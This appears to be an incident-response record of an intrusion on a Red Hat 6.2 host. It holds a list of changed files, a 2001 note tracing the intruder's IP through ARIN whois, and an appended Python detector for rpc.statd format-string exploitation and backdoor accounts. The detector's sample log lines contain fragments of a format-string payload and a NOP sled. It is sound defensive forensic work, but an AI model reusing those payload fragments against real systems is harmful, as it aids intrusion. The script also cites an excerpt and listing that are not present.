/lib/modules/2.2.14-5.0/misc/es1370.o
/lib/modules/2.2.14-5.0/misc/es1371.o
/lib/modules/2.2.14-5.0/misc/esi.o
/lib/modules/2.2.14-5.0/misc/esp.o
/lib/modules/2.2.14-5.0/misc/esssolo1.o
/lib/modules/2.2.14-5.0/misc/fit2.o
/lib/modules/2.2.14-5.0/misc/fit3.o
/lib/modules/2.2.14-5.0/misc/friq.o
/lib/modules/2.2.14-5.0/misc/frpw.o
/lib/modules/2.2.14-5.0/misc/ftape.o
/lib/modules/2.2.14-5.0/misc/girbil.o
/lib/modules/2.2.14-5.0/misc/gus.o
/lib/modules/2.2.14-5.0/misc/hisax.o
/lib/modules/2.2.14-5.0/misc/i2c.o
/lib/modules/2.2.14-5.0/misc/icn.o
/lib/modules/2.2.14-5.0/misc/ip2.o
/lib/modules/2.2.14-5.0/misc/ip2main.o
/lib/modules/2.2.14-5.0/misc/iph5526.o
/lib/modules/2.2.14-5.0/misc/ircomm_tty.o
/lib/modules/2.2.14-5.0/misc/irlpt.o
/lib/modules/2.2.14-5.0/misc/irlpt_client.o
/lib/modules/2.2.14-5.0/misc/irlpt_server.o
/lib/modules/2.2.14-5.0/misc/irport.o
/lib/modules/2.2.14-5.0/misc/irtty.o
/lib/modules/2.2.14-5.0/misc/isdn.o
/lib/modules/2.2.14-5.0/misc/isdn_bsdcomp.o
/lib/modules/2.2.14-5.0/misc/isdnloop.o
/lib/modules/2.2.14-5.0/misc/isicom.o
/lib/modules/2.2.14-5.0/misc/istallion.o
/lib/modules/2.2.14-5.0/misc/ixj.o
/lib/modules/2.2.14-5.0/misc/joy-analog.o
/lib/modules/2.2.14-5.0/misc/joy-assassin.o
/lib/modules/2.2.14-5.0/misc/joy-console.o
/lib/modules/2.2.14-5.0/misc/joy-creative.o
/lib/modules/2.2.14-5.0/misc/joy-db9.o
/lib/modules/2.2.14-5.0/misc/joy-gravis.o
/lib/modules/2.2.14-5.0/misc/joy-lightning.o
/lib/modules/2.2.14-5.0/misc/joy-logitech.o
/lib/modules/2.2.14-5.0/misc/joy-magellan.o
/lib/modules/2.2.14-5.0/misc/joy-pci.o
/lib/modules/2.2.14-5.0/misc/joy-sidewinder.o
/lib/modules/2.2.14-5.0/misc/joy-spaceball.o
/lib/modules/2.2.14-5.0/misc/joy-spaceorb.o
/lib/modules/2.2.14-5.0/misc/joy-thrustmaster.o
/lib/modules/2.2.14-5.0/misc/joy-turbografx.o
/lib/modules/2.2.14-5.0/misc/joy-warrior.o
/lib/modules/2.2.14-5.0/misc/joystick.o
/lib/modules/2.2.14-5.0/misc/kbic.o
/lib/modules/2.2.14-5.0/misc/kernelcapi.o
/lib/modules/2.2.14-5.0/misc/ktti.o
/lib/modules/2.2.14-5.0/misc/litelink.o
/lib/modules/2.2.14-5.0/misc/lp.o
/lib/modules/2.2.14-5.0/misc/mad16.o
/lib/modules/2.2.14-5.0/misc/maestro.o
/lib/modules/2.2.14-5.0/misc/maui.o
/lib/modules/2.2.14-5.0/misc/moxa.o
/lib/modules/2.2.14-5.0/misc/mpu401.o
/lib/modules/2.2.14-5.0/misc/msbusmouse.o
/lib/modules/2.2.14-5.0/misc/msnd.o
/lib/modules/2.2.14-5.0/misc/msnd_classic.o
/lib/modules/2.2.14-5.0/misc/msnd_pinnacle.o
/lib/modules/2.2.14-5.0/misc/msp3400.o
/lib/modules/2.2.14-5.0/misc/mxser.o
/lib/modules/2.2.14-5.0/misc/n_hdlc.o
/lib/modules/2.2.14-5.0/misc/nm256.o
/lib/modules/2.2.14-5.0/misc/nvram.o
/lib/modules/2.2.14-5.0/misc/on20.o
/lib/modules/2.2.14-5.0/misc/on26.o
/lib/modules/2.2.14-5.0/misc/opl3.o
/lib/modules/2.2.14-5.0/misc/opl3sa.o
/lib/modules/2.2.14-5.0/misc/opl3sa2.o
/lib/modules/2.2.14-5.0/misc/paride.o
/lib/modules/2.2.14-5.0/misc/parport.o
/lib/modules/2.2.14-5.0/misc/parport_pc.o
/lib/modules/2.2.14-5.0/misc/parport_probe.o
/lib/modules/2.2.14-5.0/misc/pas2.o
/lib/modules/2.2.14-5.0/misc/pc110pad.o
/lib/modules/2.2.14-5.0/misc/pc87108.o
/lib/modules/2.2.14-5.0/misc/pcbit.o
/lib/modules/2.2.14-5.0/misc/pcd.o
/lib/modules/2.2.14-5.0/misc/pcwd.o
/lib/modules/2.2.14-5.0/misc/pd.o
/lib/modules/2.2.14-5.0/misc/pf.o
/lib/modules/2.2.14-5.0/misc/pg.o
/lib/modules/2.2.14-5.0/misc/phonedev.o
/lib/modules/2.2.14-5.0/misc/pms.o
/lib/modules/2.2.14-5.0/misc/pss.o
/lib/modules/2.2.14-5.0/misc/pt.o
/lib/modules/2.2.14-5.0/misc/qpmouse.o
/lib/modules/2.2.14-5.0/misc/radio-aimslab.o
/lib/modules/2.2.14-5.0/misc/radio-aztech.o
/lib/modules/2.2.14-5.0/misc/radio-cadet.o
/lib/modules/2.2.14-5.0/misc/radio-gemtek.o
/lib/modules/2.2.14-5.0/misc/radio-miropcm20.o
/lib/modules/2.2.14-5.0/misc/radio-rtrack2.o
/lib/modules/2.2.14-5.0/misc/radio-sf16fmi.o
/lib/modules/2.2.14-5.0/misc/radio-trust.o
/lib/modules/2.2.14-5.0/misc/radio-typhoon.o
/lib/modules/2.2.14-5.0/misc/radio-zoltrix.o
/lib/modules/2.2.14-5.0/misc/riscom8.o
/lib/modules/2.2.14-5.0/misc/rocket.o
/lib/modules/2.2.14-5.0/misc/saa5249.o
/lib/modules/2.2.14-5.0/misc/saa7111.o
/lib/modules/2.2.14-5.0/misc/saa7185.o
/lib/modules/2.2.14-5.0/misc/sb.o
/lib/modules/2.2.14-5.0/misc/sgalaxy.o
/lib/modules/2.2.14-5.0/misc/smc-ircc.o
/lib/modules/2.2.14-5.0/misc/softdog.o
/lib/modules/2.2.14-5.0/misc/softoss2.o
/lib/modules/2.2.14-5.0/misc/sonicvibes.o
/lib/modules/2.2.14-5.0/misc/sound.o
/lib/modules/2.2.14-5.0/misc/soundcore.o
/lib/modules/2.2.14-5.0/misc/soundlow.o
/lib/modules/2.2.14-5.0/misc/specialix.o
/lib/modules/2.2.14-5.0/misc/sscape.o
/lib/modules/2.2.14-5.0/misc/stallion.o
/lib/modules/2.2.14-5.0/misc/sunrpc.o
/lib/modules/2.2.14-5.0/misc/sx.o
/lib/modules/2.2.14-5.0/misc/synclink.o
/lib/modules/2.2.14-5.0/misc/t1isa.o
/lib/modules/2.2.14-5.0/misc/t1pci.o
/lib/modules/2.2.14-5.0/misc/tekram.o
/lib/modules/2.2.14-5.0/misc/toshoboe.o
/lib/modules/2.2.14-5.0/misc/trix.o
/lib/modules/2.2.14-5.0/misc/tuner.o
/lib/modules/2.2.14-5.0/misc/uart401.o
/lib/modules/2.2.14-5.0/misc/uircc.o
/lib/modules/2.2.14-5.0/misc/v_midi.o
/lib/modules/2.2.14-5.0/misc/via82cxxx.o
/lib/modules/2.2.14-5.0/misc/videodev.o
/lib/modules/2.2.14-5.0/misc/w83977af_ir.o
/lib/modules/2.2.14-5.0/misc/wanrouter.o
/lib/modules/2.2.14-5.0/misc/wavefront.o
/lib/modules/2.2.14-5.0/misc/wdt.o
/lib/modules/2.2.14-5.0/misc/zft-compressor.o
/lib/modules/2.2.14-5.0/misc/zftape.o
/lib/modules/2.2.14-5.0/net/3c501.o
/lib/modules/2.2.14-5.0/net/3c503.o
/lib/modules/2.2.14-5.0/net/3c505.o
/lib/modules/2.2.14-5.0/net/3c507.o
/lib/modules/2.2.14-5.0/net/3c509.o
/lib/modules/2.2.14-5.0/net/3c515.o
/lib/modules/2.2.14-5.0/net/3c59x.o
/lib/modules/2.2.14-5.0/net/3c90x.o
/lib/modules/2.2.14-5.0/net/82596.o
/lib/modules/2.2.14-5.0/net/8390.o
/lib/modules/2.2.14-5.0/net/ac3200.o
/lib/modules/2.2.14-5.0/net/acenic.o
/lib/modules/2.2.14-5.0/net/arlan-proc.o
/lib/modules/2.2.14-5.0/net/arlan.o
/lib/modules/2.2.14-5.0/net/at1700.o
/lib/modules/2.2.14-5.0/net/bonding.o
/lib/modules/2.2.14-5.0/net/bsd_comp.o
/lib/modules/2.2.14-5.0/net/cosa.o
/lib/modules/2.2.14-5.0/net/cs89x0.o
/lib/modules/2.2.14-5.0/net/de4x5.o
/lib/modules/2.2.14-5.0/net/de600.o
/lib/modules/2.2.14-5.0/net/de620.o
/lib/modules/2.2.14-5.0/net/depca.o
/lib/modules/2.2.14-5.0/net/dgrs.o
/lib/modules/2.2.14-5.0/net/dlci.o
/lib/modules/2.2.14-5.0/net/dmfe.o
/lib/modules/2.2.14-5.0/net/dummy.o
/lib/modules/2.2.14-5.0/net/e2100.o
/lib/modules/2.2.14-5.0/net/eepro.o
/lib/modules/2.2.14-5.0/net/eepro100.o
/lib/modules/2.2.14-5.0/net/eexpress.o
/lib/modules/2.2.14-5.0/net/epic100.o
/lib/modules/2.2.14-5.0/net/eql.o
/lib/modules/2.2.14-5.0/net/es3210.o
/lib/modules/2.2.14-5.0/net/eth16i.o
/lib/modules/2.2.14-5.0/net/ethertap.o
/lib/modules/2.2.14-5.0/net/ewrk3.o
/lib/modules/2.2.14-5.0/net/fmv18x.o
/lib/modules/2.2.14-5.0/net/hostess_sv11.o
/lib/modules/2.2.14-5.0/net/hp-plus.o
/lib/modules/2.2.14-5.0/net/hp.o
/lib/modules/2.2.14-5.0/net/hp100.o
/lib/modules/2.2.14-5.0/net/ibmtr.o
/lib/modules/2.2.14-5.0/net/ircomm.o
/lib/modules/2.2.14-5.0/net/irda.o
/lib/modules/2.2.14-5.0/net/irda_deflate.o
/lib/modules/2.2.14-5.0/net/irlan.o
/lib/modules/2.2.14-5.0/net/lance.o
/lib/modules/2.2.14-5.0/net/lne390.o
/lib/modules/2.2.14-5.0/net/ne.o
/lib/modules/2.2.14-5.0/net/ne2k-pci.o
/lib/modules/2.2.14-5.0/net/ne3210.o
/lib/modules/2.2.14-5.0/net/ni5010.o
/lib/modules/2.2.14-5.0/net/ni52.o
/lib/modules/2.2.14-5.0/net/ni65.o
/lib/modules/2.2.14-5.0/net/old_tulip.o
/lib/modules/2.2.14-5.0/net/olympic.o
/lib/modules/2.2.14-5.0/net/pcnet32.o
/lib/modules/2.2.14-5.0/net/plip.o
/lib/modules/2.2.14-5.0/net/ppp.o
/lib/modules/2.2.14-5.0/net/ppp_deflate.o
/lib/modules/2.2.14-5.0/net/rcpci.o
/lib/modules/2.2.14-5.0/net/rtl8139.o
/lib/modules/2.2.14-5.0/net/sb1000.o
/lib/modules/2.2.14-5.0/net/sbni.o
/lib/modules/2.2.14-5.0/net/sdla.o
/lib/modules/2.2.14-5.0/net/sdladrv.o
/lib/modules/2.2.14-5.0/net/sealevel.o
/lib/modules/2.2.14-5.0/net/shaper.o
/lib/modules/2.2.14-5.0/net/sis900.o
/lib/modules/2.2.14-5.0/net/sk98lin.o
/lib/modules/2.2.14-5.0/net/sktr.o
/lib/modules/2.2.14-5.0/net/slhc.o
/lib/modules/2.2.14-5.0/net/slip.o
/lib/modules/2.2.14-5.0/net/smc-ultra.o
/lib/modules/2.2.14-5.0/net/smc-ultra32.o
/lib/modules/2.2.14-5.0/net/smc9194.o
/lib/modules/2.2.14-5.0/net/strip.o
/lib/modules/2.2.14-5.0/net/syncppp.o
/lib/modules/2.2.14-5.0/net/tlan.o
/lib/modules/2.2.14-5.0/net/tulip.o
/lib/modules/2.2.14-5.0/net/via-rhine.o
/lib/modules/2.2.14-5.0/net/wanpipe.o
/lib/modules/2.2.14-5.0/net/wavelan.o
/lib/modules/2.2.14-5.0/net/wd.o
/lib/modules/2.2.14-5.0/net/yellowfin.o
/lib/modules/2.2.14-5.0/net/z85230.o
/lib/modules/2.2.14-5.0/scsi/53c7,8xx.o
/lib/modules/2.2.14-5.0/scsi/AM53C974.o
/lib/modules/2.2.14-5.0/scsi/BusLogic.o
/lib/modules/2.2.14-5.0/scsi/NCR53c406a.o
/lib/modules/2.2.14-5.0/scsi/a100u2w.o
/lib/modules/2.2.14-5.0/scsi/advansys.o
/lib/modules/2.2.14-5.0/scsi/aha152x.o
/lib/modules/2.2.14-5.0/scsi/aha1542.o
/lib/modules/2.2.14-5.0/scsi/aha1740.o
/lib/modules/2.2.14-5.0/scsi/aic7xxx.o
/lib/modules/2.2.14-5.0/scsi/atp870u.o
/lib/modules/2.2.14-5.0/scsi/dtc.o
/lib/modules/2.2.14-5.0/scsi/eata.o
/lib/modules/2.2.14-5.0/scsi/eata_dma.o
/lib/modules/2.2.14-5.0/scsi/eata_pio.o
/lib/modules/2.2.14-5.0/scsi/fdomain.o
/lib/modules/2.2.14-5.0/scsi/g_NCR5380.o
/lib/modules/2.2.14-5.0/scsi/gdth.o
/lib/modules/2.2.14-5.0/scsi/ide-scsi.o
/lib/modules/2.2.14-5.0/scsi/imm.o
/lib/modules/2.2.14-5.0/scsi/in2000.o
/lib/modules/2.2.14-5.0/scsi/initio.o
/lib/modules/2.2.14-5.0/scsi/ips.o
/lib/modules/2.2.14-5.0/scsi/megaraid.o
/lib/modules/2.2.14-5.0/scsi/ncr53c8xx.o
/lib/modules/2.2.14-5.0/scsi/pas16.o
/lib/modules/2.2.14-5.0/scsi/pci2000.o
/lib/modules/2.2.14-5.0/scsi/pci2220i.o
/lib/modules/2.2.14-5.0/scsi/ppa.o
/lib/modules/2.2.14-5.0/scsi/psi240i.o
/lib/modules/2.2.14-5.0/scsi/qlogicfas.o
/lib/modules/2.2.14-5.0/scsi/qlogicfc.o
/lib/modules/2.2.14-5.0/scsi/qlogicisp.o
/lib/modules/2.2.14-5.0/scsi/scsi_debug.o
/lib/modules/2.2.14-5.0/scsi/seagate.o
/lib/modules/2.2.14-5.0/scsi/sg.o
/lib/modules/2.2.14-5.0/scsi/sim710.o
/lib/modules/2.2.14-5.0/scsi/st.o
/lib/modules/2.2.14-5.0/scsi/sym53c416.o
/lib/modules/2.2.14-5.0/scsi/sym53c8xx.o
/lib/modules/2.2.14-5.0/scsi/t128.o
/lib/modules/2.2.14-5.0/scsi/tmscsim.o
/lib/modules/2.2.14-5.0/scsi/u14-34f.o
/lib/modules/2.2.14-5.0/scsi/ultrastor.o
/lib/modules/2.2.14-5.0/scsi/wd7000.o
/lib/modules/2.2.14-5.0/video/matroxfb.o
/lib/modules/2.2.14-5.0/video/mdacon.o
/usr/X11R6/lib/X11/fonts/misc/fonts.dir
/usr/doc/libtool-1.3.4/demo/Makefile.in
/usr/doc/libtool-1.3.4/demo/aclocal.m4
/usr/lib/umb-scheme/slibcat
/usr/share/fonts/ISO8859-2/100dpi/fonts.dir
/usr/share/fonts/ISO8859-2/75dpi/fonts.dir
/usr/share/fonts/ISO8859-7/100dpi/fonts.dir
/usr/share/fonts/ISO8859-7/75dpi/fonts.dir
/usr/share/fonts/fontmap
/usr/share/texmf/ls-R
/usr/src/linux-2.2.14/Documentation/Configure.help
/usr/src/linux-2.2.14/arch/i386/defconfig
/usr/src/linux-2.2.14/drivers/scsi/.depend
/usr/src/linux-2.2.14/drivers/sound/.depend
/usr/src/linux-2.2.14/include/linux/autoconf.h
/usr/src/linux-2.2.14/net/Config.in
/usr/src/linux-2.2.14/net/Makefile
/usr/src/linux-2.2.14/net/ipv4/.depend
/usr/src/linux-2.2.14/net/ipv4/af_inet.c
/var/log/lastlog
/var/log/sendmail.st

==========================================================================

Date: Tue, Mar 6 2001 19:55:04
Comments added by wes

The IP address in /var/log/wtmp that was connecting as the user sdr is: 200.51.210.75

#####################

According to ARIN:

TELINTAR UOS (NETBLK-TELINTAR-UOS4-AR)                          TELINTAR-UOS4-AR       200.51.0.0 - 200.51.255.255
Advance Telecomunicaciones S.A. (NETBLK-ADVANCE-INTERACTIV-AR)  ADVANCE-INTERACTIV-AR  200.51.208.0 - 200.51.217.255

#########################

And Telintar:

TELINTAR UOS (NETBLK-TELINTAR-UOS4-AR)
   Tucuman 1 4th floor
   Buenos Aires, Capital Federal 1001
   AR

   Netname: TELINTAR-UOS4-AR
   Netblock: 200.51.0.0 - 200.51.255.255
   Maintainer: TLAR

   Coordinator:
      Tld, Poc  (PT92-ARIN)  noc@telintar.net.ar
      54-11-4370-1555 (FAX) 54-11-4373-9341

   Domain System inverse mapping provided by:

   VENUS.SUR.TELINTAR.COM.AR    200.0.193.100
   XANADU.SUR.TELINTAR.COM.AR   200.0.193.98

   ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE

   Record last updated on 24-Feb-2000.
   Database last updated on 6-Mar-2001 19:02:59 EDT.

#############################

And Advance Telecommunications:

Advance Telecomunicaciones S.A. (NETBLK-ADVANCE-INTERACTIV-AR)
   Tucuman 1,Piso 8
   Buenos Aires, Buenos Aires
   AR

   Netname: ADVANCE-INTERACTIV-AR
   Netblock: 200.51.208.0 - 200.51.217.255
   Maintainer: AVTC

   Coordinator:
      Tld, Poc  (PT92-ARIN)  noc@telintar.net.ar
      54-11-4370-1555 (FAX) 54-11-4373-9341

   Domain System inverse mapping provided by:

   DNS1.INTERNET-MRSE-SOLUTIONS.COM   200.51.254.254
   DNS2.INTERNET-MRSE-SOLUTIONS.COM   200.51.254.251

   Record last updated on 17-Nov-2000.
   Database last updated on 6-Mar-2001 19:02:59 EDT.
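The host-side evidence in this report (the rpc.statd gethostbyname error carrying format-string directives and a NOP sled, the password set for sdr by "(null)/0", and the first login by an account that is not part of the trusted install) can be pulled out of /var/log/messages automatically. The following Python is an added example, not part of the original report or its tooling: it parses syslog lines, emits a finding for each of those three indicators, and correlates an exploit indicator with credential or account activity that follows it within a window. The sample lines are constructed after the excerpt above, in both raw-byte and quoted-printable form; the 30-minute window, the log year, and KNOWN_ACCOUNTS are assumptions.

```python
"""Extract the rpc.statd compromise indicators from syslog (added example,
not the report's tooling). Sample lines are constructed after the excerpt
in the report; the correlation window, year and account list are assumed."""
import re
from datetime import datetime, timedelta
from typing import Dict, List, Optional

SYSLOG = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) "
    r"(?P<prog>[\w./-]+)(?:\[(?P<pid>\d+)\])?: (?P<msg>.*)$")
STATD_HOSTERR = re.compile(r"gethostbyname error for (?P<arg>.*)")
FMT_DIRECTIVE = re.compile(r"%\d*[nx]")        # %n writes and %8x / %236x stack reads
NOP_RUN = re.compile(r"(?:\x90|=90){8,}")       # raw 0x90 bytes or their quoted-printable form
PW_CHANGE = re.compile(
    r"password for \((?P<user>[^/]+)/(?P<uid>\d+)\) changed by \((?P<by>.+)/(?P<byuid>\d+)\)")
LOGIN_OPEN = re.compile(r"\(login\) session opened for user (?P<user>\S+) by \(uid=(?P<uid>\d+)\)")

# Accounts of a stock Red Hat 6.2 install (assumption, taken from the passwd listing).
KNOWN_ACCOUNTS = {"root", "bin", "daemon", "adm", "lp", "sync", "shutdown", "halt", "mail",
                  "news", "uucp", "operator", "games", "gopher", "ftp", "nobody", "xfs",
                  "named", "gdm", "piranha", "postgres", "pvm", "squid"}
CORRELATION_WINDOW = timedelta(minutes=30)     # assumption
LOG_YEAR = 2001                                # syslog timestamps carry no year (assumption)

# Constructed sample modelled on the /var/log/messages excerpt; \x18 is the ^X shown there.
SAMPLE_LINES = [
    "Mar  5 03:21:54 vpn1 rpc.statd[433]: gethostbyname error for \x18\xf7\xff\xbf\x18\xf7\xff\xbf"
    "%8x%8x%8x%236x%n%137x%n" + "\x90" * 12,
    "Mar  5 03:32:04 vpn1 PAM_pwdb[11238]: password for (sdr/503) changed by ((null)/0)",
    "Mar  5 03:32:35 vpn1 PAM_pwdb[11240]: (login) session opened for user sdr by (uid=0)",
    "Mar  5 03:32:42 vpn1 inetd[763]: pid 11239: exit status 1",
    "Mar  5 04:02:05 vpn1 PAM_pwdb[11389]: (su) session opened for user news by (uid=0)",
    "Mar  5 04:02:05 vpn1 PAM_pwdb[11389]: (su) session closed for user news",
]
# The same statd line as it appears in a mailed (quoted-printable) copy of the log.
SAMPLE_QP_LINE = ("Mar  5 03:21:54 vpn1 rpc.statd[433]: gethostbyname error for ^X=F7=FF=BF"
                  + "=90" * 10)


def parse_ts(ts: str) -> datetime:
    return datetime.strptime(f"{LOG_YEAR} {' '.join(ts.split())}", "%Y %b %d %H:%M:%S")


def scan_messages(lines: List[str], known_accounts=KNOWN_ACCOUNTS) -> List[Dict]:
    """Return one finding per indicator line: kind is exploit, credential or account."""
    findings: List[Dict] = []
    for line in lines:
        m = SYSLOG.match(line)
        if not m:
            continue
        ts, prog, msg = parse_ts(m["ts"]), m["prog"], m["msg"]
        if prog == "rpc.statd":
            e = STATD_HOSTERR.search(msg)
            if e and (FMT_DIRECTIVE.search(e["arg"]) or NOP_RUN.search(e["arg"])):
                findings.append({"ts": ts, "kind": "exploit", "detail":
                                 "rpc.statd logged a hostname containing format-string directives or a NOP sled"})
        elif prog == "PAM_pwdb":
            p = PW_CHANGE.search(msg)
            if p and p["by"] == "(null)":   # password set by a root process with no login name
                findings.append({"ts": ts, "kind": "credential", "detail":
                                 f"password for {p['user']} set by uid {p['byuid']} from a process with no login name"})
            lg = LOGIN_OPEN.search(msg)
            if lg and lg["user"] not in known_accounts:
                findings.append({"ts": ts, "kind": "account", "detail":
                                 f"login by {lg['user']}, an account not in the trusted install"})
    return findings


def correlate(findings: List[Dict]) -> Optional[str]:
    """Flag an exploit indicator followed within the window by credential or account activity."""
    for ex in (f for f in findings if f["kind"] == "exploit"):
        later = [f for f in findings if f["kind"] != "exploit"
                 and ex["ts"] <= f["ts"] <= ex["ts"] + CORRELATION_WINDOW]
        if later:
            return (f"likely compromise: {ex['detail']} at {ex['ts']:%H:%M:%S}, followed by "
                    f"{len(later)} credential/account events within {CORRELATION_WINDOW}")
    return None


if __name__ == "__main__":
    found = scan_messages(SAMPLE_LINES)
    for f in found:
        print(f"{f['ts']:%b %d %H:%M:%S} {f['kind']:<10} {f['detail']}")
    print(correlate(found))
```

The per-line findings are what an IDS or log monitor would alert on; the correlation step is what turned this incident from "odd statd error" into "root compromise followed by a backdoor account" within the 20 minutes the report mentions, and it is cheap to run continuously over a syslog feed.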